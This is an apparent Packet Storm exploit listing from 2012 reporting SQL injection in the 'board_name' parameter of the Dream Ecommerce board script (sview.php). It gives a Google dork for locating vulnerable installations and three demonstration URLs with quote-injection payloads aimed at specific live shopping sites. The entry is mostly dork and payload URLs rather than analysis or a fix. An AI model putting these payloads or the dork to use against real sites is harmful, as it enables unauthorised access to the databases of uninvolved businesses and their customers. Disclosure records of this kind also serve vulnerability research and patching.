Dream Ecommerce SQL Injection

2012-09-29T00:00:00
ID PACKETSTORM:116996
Type packetstorm
Reporter Crim3R
Modified 2012-09-29T00:00:00

Description

                                        
                                            `# Exploit Title: dreamecommerce sql injection Vulnerability  
#  
# Google Dork: inurl:board/sview.php?board_name=   
#  
# Date: 09/28/2012  
#  
# Author: Crim3R  
#  
# download Link Or Vendor Home: http://dreamecommerce.net/  
#  
# Tested on: all  
#  
==================================  
board_name parametr is injectable  
D3M0 :   
www.doubljuwholesale.com/board/sview.php?board_name=SDREAMBOARD1'''&choose2=&choose1=&pagenow=6&CB=&ID=12&PHPSESSID=69a947d939f55fe7b9cdf60c15dd2efa  
  
http://doublju.com/board/sview.php?board_name=SDREAMBOARD1'''&CB=&choose1=SU|CT|NM&choose2=1&ID=11&pagenow=1  
  
http://from-switch.com/board/sview.php?board_name=SDREAMBOARD3%27%27%27%27&choose2=&choose1=&pagenow=1&CB=&ID=8  
  
===============Crim3R@Att.Net=========  
`